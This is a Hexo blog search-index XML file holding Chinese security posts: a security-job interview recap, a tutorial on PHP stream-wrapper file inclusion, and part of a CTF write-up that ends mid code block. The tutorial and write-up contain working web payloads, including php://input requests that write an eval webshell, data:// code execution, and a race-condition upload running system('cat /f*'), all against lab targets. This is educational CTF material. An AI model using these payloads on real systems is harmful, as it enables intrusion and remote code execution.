-
-
Notifications
You must be signed in to change notification settings - Fork 0
/
local-search.xml
1002 lines (480 loc) · 581 KB
/
local-search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>360安全研究员(Web方向)秋招面经</title>
<link href="/2023/10/22/360%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6%E5%91%98%EF%BC%88Web%E6%96%B9%E5%90%91%EF%BC%89%E7%A7%8B%E6%8B%9B%E9%9D%A2%E7%BB%8F/"/>
<url>/2023/10/22/360%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6%E5%91%98%EF%BC%88Web%E6%96%B9%E5%90%91%EF%BC%89%E7%A7%8B%E6%8B%9B%E9%9D%A2%E7%BB%8F/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>收到面试通知时还是挺震惊的,因为实在没想到我这破双非本科竟然能过乙方大厂简历关。岗位名称是安全研究员(Web漏洞挖掘与利用),base北京。这次面试的难度对于网安大厂来说,属实是有点简单了,感觉更像是kpi面,hr冲业绩的。</p><h2 id="面试题"><a href="#面试题" class="headerlink" title="面试题"></a>面试题</h2><p>1.自我介绍,例如在校经历、专业技能和项目经验</p><p>2.有没有参加过攻防演练、HW?</p><p>3.内网渗透的具体过程</p><p>4.Windows提权有哪些方式?</p><p>5.内网渗透有没有拿下域控的经历?</p><p>6.域环境有哪些相关漏洞?</p><p>7.黄金票据和白银票据的区别和利用方式</p><p>8.木马免杀的方法有哪些?</p><p>9.成功绕过了哪些杀毒软件?</p><p>10.反序列化有哪些漏洞,复现过吗?关键函数是什么?</p><p>11.SSRF漏洞的原理和修复方式</p><p>12.有没有信息安全相关证书?</p><h2 id="感受"><a href="#感受" class="headerlink" title="感受"></a>感受</h2><p>面试结束后,hr说我们希望招聘到会内网渗透和免杀的人参加攻防演练,并且只需要一个人,我顿时就觉得这是在冲kpi了。凉凉了,应该不会有二面了。</p>]]></content>
<categories>
<category>生活点滴</category>
</categories>
<tags>
<tag>面经</tag>
</tags>
</entry>
<entry>
<title>关于PHP伪协议的那些事</title>
<link href="/2023/03/31/%E5%85%B3%E4%BA%8EPHP%E4%BC%AA%E5%8D%8F%E8%AE%AE%E7%9A%84%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
<url>/2023/03/31/%E5%85%B3%E4%BA%8EPHP%E4%BC%AA%E5%8D%8F%E8%AE%AE%E7%9A%84%E9%82%A3%E4%BA%9B%E4%BA%8B/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近在准备CTF的线下攻防比赛(AWD),看到一篇文章中有师傅提到web漏洞中可能会出现这个知识点,于是在这里归纳总结一下。</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><h3 id="file-协议"><a href="#file-协议" class="headerlink" title="file:// 协议"></a><code>file://</code> 协议</h3><ul><li><p><strong>条件</strong>:</p><ul><li><code>allow_url_fopen</code>:off/on</li><li><code>allow_url_include</code> :off/on</li></ul></li><li><p><strong>作用</strong>:<br>用于访问本地文件系统,在CTF中通常用来<strong>读取本地文件</strong>的且不受<code>allow_url_fopen</code>与<code>allow_url_include</code>的影响。<br><code>include()/require()/include_once()/require_once()</code>参数可控的情况下,如导入为非<code>.php</code>文件,则仍按照php语法进行解析,这是<code>include()</code>函数所决定的。</p></li><li><p><strong>说明</strong>:<br><code>file://</code> 文件系统是 PHP 使用的默认封装协议,展现了本地文件系统。当指定了一个相对路径(不以/、、\或 Windows 盘符开头的路径)提供的路径将基于当前的工作目录。在很多情况下是脚本所在的目录,除非被修改了。使用 CLI 的时候,目录默认是脚本被调用时所在的目录。在某些函数里,例如 <code>fopen()</code> 和 <code>file_get_contents()</code>,<code>include_path </code>会可选地搜索,也作为相对的路径。</p></li><li><p><strong>用法</strong>:</p><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">/<span class="hljs-type">path</span>/<span class="hljs-keyword">to</span>/file.ext<br>relative/<span class="hljs-type">path</span>/<span class="hljs-keyword">to</span>/file.ext<br>fileInCwd.ext<br>C:/<span class="hljs-type">path</span>/<span class="hljs-keyword">to</span>/winfile.ext<br>C:\<span class="hljs-type">path</span>\<span class="hljs-keyword">to</span>\winfile.ext<br>\\smbserver\<span class="hljs-keyword">share</span>\<span class="hljs-type">path</span>\<span class="hljs-keyword">to</span>\winfile.ext<br>file:///<span class="hljs-type">path</span>/<span class="hljs-keyword">to</span>/file.ext<br></code></pre></td></tr></table></figure></li><li><p><strong>示例</strong>:</p><ol><li><p><code>file://[文件的绝对路径和文件名]</code></p><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt<br></code></pre></td></tr></table></figure><p><img src="https://segmentfault.com/img/bVbrQAZ"></p></li><li><p><code>[文件的相对路径和文件名]</code></p><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">http://127.0.0.1/include.php?file=./phpinfo.txt<br></code></pre></td></tr></table></figure><p><img src="https://segmentfault.com/img/bVbrQA1"></p></li><li><p><code>[http://网络路径和文件名]</code></p><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt<br></code></pre></td></tr></table></figure><p><img src="https://segmentfault.com/img/bVbrQBb"></p></li></ol></li><li><p><strong>参考</strong>:<a href="https://link.segmentfault.com/?enc=wN8Voz1wQkMJEemKlJJ2Hg==.B7/oPK88148LTdDJACy8tIvD+waqAYHD7ErsU8Ngn+GVQafNAfZtIyschsiALxnZ">http://php.net/manual/zh/wrappers.file.php</a></p></li></ul><h3 id="php-协议"><a href="#php-协议" class="headerlink" title="php:// 协议"></a><code>php://</code> 协议</h3><ul><li><p><strong>条件</strong>:</p><ul><li><code>allow_url_fopen</code>:off/on</li><li><code>allow_url_include</code> :仅<code>php://input php://stdin php://memory php://temp </code>需要on</li></ul></li><li><p><strong>作用</strong>:<br><code>php://</code> 访问各个输入/输出流(I/O streams),在CTF中经常使用的是<code>php://filter</code>和<code>php://input</code>,<code>php://filter</code>用于<strong>读取源码</strong>,<code>php://input</code>用于<strong>执行php代码</strong>。</p></li><li><p><strong>说明</strong>:<br>PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符,<br>内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。</p><table><thead><tr><th>协议</th><th>作用</th></tr></thead><tbody><tr><td>php://input</td><td>可以访问请求的原始数据的只读流,在POST请求中访问POST的<code>data</code>部分,在<code>enctype="multipart/form-data"</code> 的时候<code>php://input </code>是无效的。</td></tr><tr><td>php://output</td><td>只写的数据流,允许以 print 和 echo 一样的方式写入到输出缓冲区。</td></tr><tr><td>php://fd</td><td>(>=5.3.6)允许直接访问指定的文件描述符。例如 <code>php://fd/3</code> 引用了文件描述符 3。</td></tr><tr><td>php://memory php://temp</td><td>(>=5.1.0)一个类似文件包装器的数据流,允许读写临时数据。两者的唯一区别是 <code>php://memory</code> 总是把数据储存在内存中,而 <code>php://temp</code> 会在内存量达到预定义的限制后(默认是 <code>2MB</code>)存入临时文件中。临时文件位置的决定和 <code>sys_get_temp_dir()</code> 的方式一致。</td></tr><tr><td>php://filter</td><td>(>=5.0.0)一种元封装器,设计用于数据流打开时的筛选过滤应用。对于一体式<code>(all-in-one)</code>的文件函数非常有用,类似 <code>readfile()</code>、<code>file()</code> 和 <code>file_get_contents()</code>,在数据流内容读取之前没有机会应用其他过滤器。</td></tr></tbody></table></li><li><p><strong><code>php://filter</code>参数详解</strong></p><p>该协议的参数会在该协议路径上进行传递,多个参数都可以在一个路径上传递。具体参考如下:</p><table><thead><tr><th>php://filter 参数</th><th>描述</th><th></th></tr></thead><tbody><tr><td>resource=<要过滤的数据流></td><td>必须项。它指定了你要筛选过滤的数据流。</td><td></td></tr><tr><td>read=<读链的过滤器></td><td>可选项。可以设定一个或多个过滤器名称,以管道符(*\</td><td>*)分隔。</td></tr><tr><td>write=<写链的过滤器></td><td>可选项。可以设定一个或多个过滤器名称,以管道符(\</td><td>)分隔。</td></tr><tr><td><; 两个链的过滤器></td><td>任何没有以 <em>read=</em> 或 <em>write=</em> 作前缀的筛选器列表会视情况应用于读或写链。</td><td></td></tr></tbody></table></li><li><p><strong>可用的过滤器列表(4类)</strong></p><p>此处列举主要的过滤器类型,详细内容请参考:<a href="https://link.segmentfault.com/?enc=SnFuHeLl8SsTJmIpSWP0Yw==.ETJk2Pqi7vlCSXba+uHtDNwwCcWsT+/ktK0RqslXfHUl5ueM4px2wLhoUdVxz/aO">https://www.php.net/manual/zh/filters.php</a></p><table><thead><tr><th>字符串过滤器</th><th>作用</th></tr></thead><tbody><tr><td>string.rot13</td><td>等同于<code>str_rot13()</code>,rot13变换</td></tr><tr><td>string.toupper</td><td>等同于<code>strtoupper()</code>,转大写字母</td></tr><tr><td>string.tolower</td><td>等同于<code>strtolower()</code>,转小写字母</td></tr><tr><td>string.strip_tags</td><td>等同于<code>strip_tags()</code>,去除html、PHP语言标签</td></tr></tbody></table><table><thead><tr><th>转换过滤器</th><th>作用</th></tr></thead><tbody><tr><td>convert.base64-encode & convert.base64-decode</td><td>等同于<code>base64_encode()</code>和<code>base64_decode()</code>,base64编码解码</td></tr><tr><td>convert.quoted-printable-encode & convert.quoted-printable-decode</td><td>quoted-printable 字符串与 8-bit 字符串编码解码</td></tr></tbody></table><table><thead><tr><th>压缩过滤器</th><th>作用</th></tr></thead><tbody><tr><td>zlib.deflate & zlib.inflate</td><td>在本地文件系统中创建 gzip 兼容文件的方法,但不产生命令行工具如 gzip的头和尾信息。只是压缩和解压数据流中的有效载荷部分。</td></tr><tr><td>bzip2.compress & bzip2.decompress</td><td>同上,在本地文件系统中创建 bz2 兼容文件的方法。</td></tr></tbody></table><table><thead><tr><th>加密过滤器</th><th>作用</th></tr></thead><tbody><tr><td>mcrypt.*</td><td>libmcrypt 对称加密算法</td></tr><tr><td>mdecrypt.*</td><td>libmcrypt 对称解密算法</td></tr></tbody></table></li><li><p><strong>示例</strong>:</p><ol><li><p><code>php://filter/read=convert.base64-encode/resource=[文件名]</code>读取文件源码(针对php文件需要base64编码)</p><figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver"><span class="hljs-keyword">http</span>://<span class="hljs-number">127.0</span><span class="hljs-number">.0</span><span class="hljs-number">.1</span>/<span class="hljs-built_in">include</span>.php?<span class="hljs-built_in">file</span>=php://<span class="hljs-built_in">filter</span>/<span class="hljs-built_in">read</span>=<span class="hljs-built_in">convert</span>.base64-encode/resource=phpinfo.php<br></code></pre></td></tr></table></figure><p><img src="https://segmentfault.com/img/bVbrQBf"></p></li><li><p><code>php://input + [POST DATA]</code>执行php代码</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">http:<span class="hljs-comment">//127.0.0.1/include.php?file=php://input</span><br>[POST DATA部分]<br><span class="hljs-meta"><?php</span> <span class="hljs-title function_ invoke__">phpinfo</span>(); <span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p><img src="https://segmentfault.com/img/bVbrQBh"></p><p>若有写入权限,写入一句话木马</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">http:<span class="hljs-comment">//127.0.0.1/include.php?file=php://input</span><br>[POST DATA部分]<br><span class="hljs-meta"><?php</span> <span class="hljs-title function_ invoke__">fputs</span>(<span class="hljs-title function_ invoke__">fopen</span>(<span class="hljs-string">'1juhua.php'</span>,<span class="hljs-string">'w'</span>),<span class="hljs-string">'<?php @eval($_GET[cmd]); ?>'</span>); <span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p><img src="https://segmentfault.com/img/bVbrQBi"></p></li></ol></li><li><p><strong>参考</strong>:<a href="https://link.segmentfault.com/?enc=9HIcngQDd6zUVI2rWGfPmw==.K75pS9JvEddLh+oG19cnYbxWhCidEHXa723x8dV3Dri0Jd5sqTgvjskmwx+6+Qcu">https://php.net/manual/zh/wrappers.php.php</a></p></li></ul><h3 id="zip-amp-bzip2-amp-zlib-协议"><a href="#zip-amp-bzip2-amp-zlib-协议" class="headerlink" title="zip:// & bzip2:// & zlib:// 协议"></a><code>zip:// & bzip2:// & zlib://</code> 协议</h3><ul><li><p><strong>条件</strong>:</p><ul><li><code>allow_url_fopen</code>:off/on</li><li><code>allow_url_include</code> :off/on</li></ul></li><li><p><strong>作用</strong>:<code>zip:// & bzip2:// & zlib://</code> 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀:<code>jpg png gif xxx</code> 等等。</p></li><li><p><strong>示例</strong>:</p><ol><li><p><code>zip://[压缩文件绝对路径]%23[压缩文件内的子文件名]</code>(#编码为%23)</p><p>压缩 phpinfo.txt 为 phpinfo.zip ,压缩包重命名为 phpinfo.jpg ,并上传</p><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt<br></code></pre></td></tr></table></figure><p><img src="https://segmentfault.com/img/bVbrQBj"></p></li><li><p><code>compress.bzip2://file.bz2</code></p><p>压缩 phpinfo.txt 为 phpinfo.bz2 并上传(同样支持任意后缀名)</p><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2<br></code></pre></td></tr></table></figure><p><img src="https://segmentfault.com/img/bVbrQBt"></p></li><li><p><code>compress.zlib://file.gz</code></p><p>压缩 phpinfo.txt 为 phpinfo.gz 并上传(同样支持任意后缀名)</p><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz<br></code></pre></td></tr></table></figure><p><img src="https://segmentfault.com/img/bVbrQBu" alt="图片描述"></p></li></ol></li><li><p><strong>参考</strong>:<a href="https://link.segmentfault.com/?enc=GiuGtHKAlZaKFkSBJmrlIw==.3xzOWnz45qNJyV6WkZqliObZtNIx9DWj2NJRfc5GU1fCWvS7DmJT6+K3m537FnTpJz4QABp8678tfw9FRe+jCw==">http://php.net/manual/zh/wrappers.compression.php</a></p></li></ul><h3 id="data-协议"><a href="#data-协议" class="headerlink" title="data:// 协议"></a><code>data://</code> 协议</h3><ul><li><p><strong>条件</strong>:</p><ul><li><code>allow_url_fopen</code>:on</li><li><code>allow_url_include</code> :on</li></ul></li><li><p><strong>作用</strong>:自<code>PHP>=5.2.0</code>起,可以使用<code>data://</code>数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。</p></li><li><p><strong>用法</strong>:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">data:<span class="hljs-regexp">//</span>text/plain,<br>data:<span class="hljs-regexp">//</span>text/plain;base64,<br></code></pre></td></tr></table></figure></li><li><p><strong>示例</strong>:</p><ol><li><p><code>data://text/plain,</code></p><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?><br></code></pre></td></tr></table></figure><p><img src="https://segmentfault.com/img/bVbrQBB" alt="图片描述"></p></li><li><p><code>data://text/plain;base64,</code></p><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b<br></code></pre></td></tr></table></figure><p><img src="https://segmentfault.com/img/bVbrQBD" alt="图片描述"></p></li></ol></li></ul><h3 id="http-amp-https-协议"><a href="#http-amp-https-协议" class="headerlink" title="http:// & https:// 协议"></a><code>http:// & https://</code> 协议</h3><ul><li><p><strong>条件</strong>:</p><ul><li><code>allow_url_fopen</code>:on</li><li><code>allow_url_include</code> :on</li></ul></li><li><p><strong>作用</strong>:常规 URL 形式,允许通过 <code>HTTP 1.0</code> 的 GET方法,以只读访问文件或资源。CTF中通常用于远程包含。</p></li><li><p><strong>用法</strong>:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span>example.com<br>http:<span class="hljs-regexp">//</span>example.com/file.php?var1=val1&var2=val2<br>http:<span class="hljs-regexp">//u</span>ser:password@example.com<br>https:<span class="hljs-regexp">//</span>example.com<br>https:<span class="hljs-regexp">//</span>example.com/file.php?var1=val1&var2=val2<br>https:<span class="hljs-regexp">//u</span>ser:password@example.com<br></code></pre></td></tr></table></figure></li><li><p><strong>示例</strong>:</p><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt<br></code></pre></td></tr></table></figure><p><img src="https://segmentfault.com/img/bVbrQBP" alt="图片描述"></p></li></ul><h3 id="phar-协议"><a href="#phar-协议" class="headerlink" title="phar:// 协议"></a><code>phar://</code> 协议</h3><p><code>phar://</code>协议与<code>zip://</code>类似,同样可以访问zip格式压缩包内容,在这里只给出一个示例:</p><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">http://127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt<br></code></pre></td></tr></table></figure><p><img src="https://segmentfault.com/img/bVbrQBX"></p><p>另外在 Black Hat 2018 大会上,研究人员公布了一款针对PHP应用程序的全新攻击技术:<strong>phar://协议对象注入技术</strong>。</p><p>因为该利用点需要满足一定的条件才能利用,可以参考下面这篇文章,里面的demo也非常详细,留作以后专门研究一下。</p>]]></content>
<categories>
<category>CTF</category>
</categories>
</entry>
<entry>
<title>第二届“湖北省大学生信创大赛”复赛Write-up</title>
<link href="/2023/03/07/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E2%80%9C%E6%B9%96%E5%8C%97%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E4%BF%A1%E5%88%9B%E5%A4%A7%E8%B5%9B%E2%80%9C%E5%A4%8D%E8%B5%9BWrite-up/"/>
<url>/2023/03/07/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E2%80%9C%E6%B9%96%E5%8C%97%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E4%BF%A1%E5%88%9B%E5%A4%A7%E8%B5%9B%E2%80%9C%E5%A4%8D%E8%B5%9BWrite-up/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>由于本次比赛的初赛采用的是知识问答的形式,所以没有wp,特此说明。这是一篇迟到的wp,因为距离线上复赛已经过去了四个多月,线下决赛也是姗姗来迟,直到最近几天本人才拿到wp。未经本人授权,禁止转载和发布!</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><h3 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h3><h4 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h4><p>启动环境,拿到源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-string">"<h1>WELCOME 23333333333</h1>"</span>.<span class="hljs-string">"\n"</span>;<br><span class="hljs-variable">$url</span> = <span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">"HTTP_REFERER"</span>];<br><span class="hljs-variable">$r</span> = <span class="hljs-title function_ invoke__">parse_url</span>(<span class="hljs-variable">$url</span>);<br><span class="hljs-keyword">if</span>(!<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$r</span>[<span class="hljs-string">'host'</span>]) && <span class="hljs-variable">$r</span>[<span class="hljs-string">'host'</span>] === <span class="hljs-string">'localhost'</span> && <span class="hljs-variable">$r</span>[<span class="hljs-string">'scheme'</span>] === <span class="hljs-string">'file'</span>){<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">"yeah u are admin"</span>.<span class="hljs-string">"<br>"</span>;<br>}<br><span class="hljs-keyword">else</span>{<br> <span class="hljs-keyword">die</span>(<span class="hljs-string">'u are not admin'</span>.<span class="hljs-string">"<br>"</span>);<br>}<br><br><span class="hljs-comment">//only admin can do it</span><br><span class="hljs-variable">$content</span> = <span class="hljs-title function_ invoke__">addslashes</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'content'</span>]);<br><span class="hljs-keyword">echo</span> <span class="hljs-string">'now_you_are_admin'</span>.<span class="hljs-string">"<br>"</span>;<br><span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">file_exists</span>(<span class="hljs-string">"admin.php"</span>)){<br> <span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-string">'admin.php'</span>, <span class="hljs-string">"secret = 'xxx'"</span>);<br> <span class="hljs-comment">//change the content</span><br> <span class="hljs-keyword">if</span>(<span class="hljs-variable">$content</span>){<br> <span class="hljs-variable">$file</span> = <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">"./admin.php"</span>);<br> <span class="hljs-variable">$file</span> = <span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">"/secret = '.*'/"</span>, <span class="hljs-string">"secret = '<span class="hljs-subst">{$content}</span>'"</span>, <span class="hljs-variable">$file</span>);<br> <span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-string">'./admin.php'</span>, <span class="hljs-variable">$file</span>);<br> }<br>}<br><br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'reset'</span>])){<br> @<span class="hljs-title function_ invoke__">exec</span>(<span class="hljs-string">'/bin/rm -rf admin.php'</span>);<br>}<br><br><span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>源码分两部分,⼀是身份验证,⼆是写文件。</p><p>第⼀部分身份验证要求伪造admin身份,验证逻辑是通过检测<code>Referer</code>请求头,要求使用file协议,地址是localhost。</p><p>第⼆部分写文件来上马,题目有<code>addslashes</code>函数过滤,引号被转义不能使用,写⼊内容为<code><?php eval($_GET[1]);?></code>,绕过引号:</p><p><img src="https://raw.githubusercontent.com/RookieTerry/RookieTerry.github.io/main/img/202305041821877.png"></p><p>访问<code>admin.php</code>,GET传参进行任意代码执行。我采用的是POST传参,再用蚁剑连接,也能拿到flag。</p><h4 id="tjjz"><a href="#tjjz" class="headerlink" title="tjjz"></a>tjjz</h4><p>好家伙,没想到这个题目的名称就是考查的知识点,属实是没有反应过来。这题考查的是文件上传,加上了条件竞争。</p><p>测试发现环境不能覆盖已有的文件,且<code>upload</code>目录下应该是存有<code>.htaccess</code>文件,使得上传配置文件不可行。</p><p>burpsuite构造包爆破,通过上⼀题推测flag仍然在根目录的flag文件中,使用<code>system('cat /f*')</code>进行简单测试:</p><p><img src="https://raw.githubusercontent.com/RookieTerry/RookieTerry.github.io/main/img/202305041821030.png" alt="web-2"></p><p>调整线程为50,持续发包,再另开⼀重放包,设置10线程,⼀段时间后可以得到反馈:</p><p><img src="https://raw.githubusercontent.com/RookieTerry/RookieTerry.github.io/main/img/202305041822774.png" alt="web-3"></p><p>拿到flag。</p><h3 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h3><h4 id="crab"><a href="#crab" class="headerlink" title="crab"></a>crab</h4><p>源码如下:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 